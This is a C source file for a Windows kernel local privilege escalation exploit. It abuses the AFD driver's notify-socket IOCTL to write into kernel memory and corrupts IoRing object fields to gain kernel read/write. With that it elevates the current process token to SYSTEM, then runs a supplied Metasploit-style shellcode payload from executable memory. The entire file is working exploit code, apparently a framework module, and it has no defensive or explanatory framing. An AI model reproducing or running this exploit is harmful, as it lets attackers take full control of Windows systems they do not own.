#include <windows.h>
#include "exploit.h"
#include "ioring.h"

BOOL InitialSetup(void) {
	HMODULE hNtdll = LoadLibrary(L"ntdll");

	if (!hNtdll) {
		dprintf("Unable to load ntdll.dll");
		goto failure;
	}
	
	if (!(NtCreateFile = (fNtCreateFile)GetProcAddress(hNtdll, "NtCreateFile"))) {
		dprintf("NtCreateFile() not found in ntdll.dll");
		goto failure;
	}

	if (!(NtDeviceIoControlFile = (fNtDeviceIoControlFile)GetProcAddress(hNtdll, "NtDeviceIoControlFile"))) {
		dprintf("NtDeviceIoControlFile() not found in ntdll.dll");
		goto failure;
	}

	if (!(NtCreateIoCompletion = (fNtCreateIoCompletion)GetProcAddress(hNtdll, "NtCreateIoCompletion"))) {
		dprintf("NtCreateIoCompletion() not found in ntdll.dll");
		goto failure;
	}

	if (!(NtSetIoCompletion = (fNtSetIoCompletion)GetProcAddress(hNtdll, "NtSetIoCompletion"))) {
		dprintf("NtSetIoCompletion() not found in ntdll.dll");
		goto failure;
	}

	if (!(NtQuerySystemInformation = (fNtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation"))) {
		dprintf("NtQuerySystemInformation() not found in ntdll.dll");
		goto failure;
	}

	return TRUE;

failure:
	if (hNtdll) {
		FreeLibrary(hNtdll);
	}
	return FALSE;
}

HRESULT ArbitraryKernelWrite0x1(void* pPwnPtr) {
    HRESULT ret;
    NTSTATUS ntStatus;
    HANDLE hCompletion = INVALID_HANDLE_VALUE;
    IO_STATUS_BLOCK IoStatusBlock = { 0 };
    HANDLE hSocket = INVALID_HANDLE_VALUE;
    UNICODE_STRING ObjectFilePath = { 0 };
    OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
    AFD_NOTIFYSOCK_DATA Data = { 0 };
    HANDLE hEvent = NULL;
    HANDLE hThread = NULL;

    // Hard-coded attributes for an IPv4 TCP socket
    BYTE bExtendedAttributes[] = {
        0x00, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x1E, 0x00, 0x41, 0x66, 0x64, 0x4F, 0x70, 0x65, 0x6E, 0x50,
        0x61, 0x63, 0x6B, 0x65, 0x74, 0x58, 0x58, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x60, 0xEF, 0x3D, 0x47, 0xFE
    };

    ntStatus = NtCreateIoCompletion(&hCompletion, MAXIMUM_ALLOWED, NULL, 1);

    if (ntStatus != STATUS_SUCCESS) {
        dprintf("NtCreateIoCompletion() failed (NTSTATUS=0x%X)", ntStatus);
        ret = E_FAIL;
        goto done;
    }

    ntStatus = NtSetIoCompletion(hCompletion, 0x1337, &IoStatusBlock, 0, 0x100);

    if (ntStatus != STATUS_SUCCESS) {
        dprintf("NtSetIoCompletion() failed (NTSTATUS=0x%X)", ntStatus);
        ret = E_FAIL;
        goto done;
    }

    ObjectFilePath.Buffer = (PWSTR)L"\\Device\\Afd\\Endpoint";
    ObjectFilePath.Length = (USHORT)wcslen(ObjectFilePath.Buffer) * sizeof(wchar_t);
    ObjectFilePath.MaximumLength = ObjectFilePath.Length;

    ObjectAttributes.Length = sizeof(ObjectAttributes);
    ObjectAttributes.ObjectName = &ObjectFilePath;
    ObjectAttributes.Attributes = 0x40;

    ntStatus = NtCreateFile(&hSocket, MAXIMUM_ALLOWED, &ObjectAttributes, &IoStatusBlock, NULL, 0, FILE_SHARE_READ | FILE_SHARE_WRITE, 1, 0, bExtendedAttributes, sizeof(bExtendedAttributes));

    if (ntStatus != STATUS_SUCCESS) {
        dprintf("NtCreateFile() failed (NTSTATUS=0x%X)", ntStatus);
        ret = E_FAIL;
        goto done;
    }

    Data.hCompletion = hCompletion;

    Data.pData1 = VirtualAlloc(NULL, 0x2000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (!Data.pData1) {
        dprintf("Call #1 to VirtualAlloc() failed (0x%X)", GetLastError());
        ret = E_FAIL;
        goto done;
    }

    Data.pData2 = VirtualAlloc(NULL, 0x2000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (!Data.pData2) {
        dprintf("Call #2 to VirtualAlloc() failed (0x%X)", GetLastError());
        ret = E_FAIL;
        goto done;
    }

    Data.dwCounter = 0x1;
    Data.dwLen = 0x1;
    Data.dwTimeout = 100000000;
    Data.pPwnPtr = pPwnPtr;

    hEvent = CreateEvent(NULL, 0, 0, NULL);

    if (!hEvent) {
        dprintf("Call to CreateEvent() failed (0x%X)", GetLastError());
        ret = E_FAIL;
        goto done;
    }

    NtDeviceIoControlFile(hSocket, hEvent, NULL, NULL, &IoStatusBlock, AFD_NOTIFYSOCK_IOCTL, &Data, 0x30, NULL, 0);

    ret = S_OK;

done:
    if (hCompletion != INVALID_HANDLE_VALUE) {
        CloseHandle(hCompletion);
    }

    if (hSocket != INVALID_HANDLE_VALUE) {
        CloseHandle(hSocket);
    }

    if (hEvent) {
        CloseHandle(hEvent);
    }

    if (Data.pData1) {
        VirtualFree(Data.pData1, 0, MEM_RELEASE);
    }

    if (Data.pData2) {
        VirtualFree(Data.pData2, 0, MEM_RELEASE);
    }

    return ret;
}

void ExecutePayload(PMSF_PAYLOAD pMsfPayload) {
    if (!pMsfPayload) {
        return;
    }

    PVOID pPayload = VirtualAlloc(NULL, pMsfPayload->dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (!pPayload) {
        return;
    }

    CopyMemory(pPayload, &pMsfPayload->cPayloadData, pMsfPayload->dwSize);
    CreateThread(NULL, 0, pPayload, NULL, 0, NULL);
}

DWORD Exploit(PVOID pPayload) {
    dprintf("Starting exploit...");

	PIORING_OBJECT pIoRing = NULL;
    DWORD dwPidSelf = GetCurrentProcessId();

	if (!InitialSetup()) {
		dprintf("Initial setup failure");
		return EXIT_FAILURE;
	}

	if (IoRingSetup(&pIoRing) != S_OK) {
		dprintf("IORING setup failed");
		return EXIT_FAILURE;
	}

	dprintf("IoRing Obj Address at %llx", pIoRing);

	if (ArbitraryKernelWrite0x1((char*)&pIoRing->RegBuffers + 0x3) != S_OK) {
		dprintf("IoRing->RegBuffers overwrite failed");
		return EXIT_FAILURE;
	}

    dprintf("IoRing->RegBuffers overwritten with address 0x1000000");

    if (ArbitraryKernelWrite0x1((char*)&pIoRing->RegBuffersCount) != S_OK) {
        dprintf("IoRing->RegBuffersCount overwrite failed");
        return EXIT_FAILURE;
    }

    dprintf("IoRing->RegBuffersCount overwritten with 0x1");

    if (IoRingLpe(dwPidSelf, 0x1000000, 0x1) != S_OK) {
        dprintf("LPE Failed");
        return EXIT_FAILURE;
    }

    dprintf("Current process token elevated to SYSTEM!");
    
    ExecutePayload(pPayload);
    
    dprintf("The payload has been executed");
    
    return EXIT_SUCCESS;
}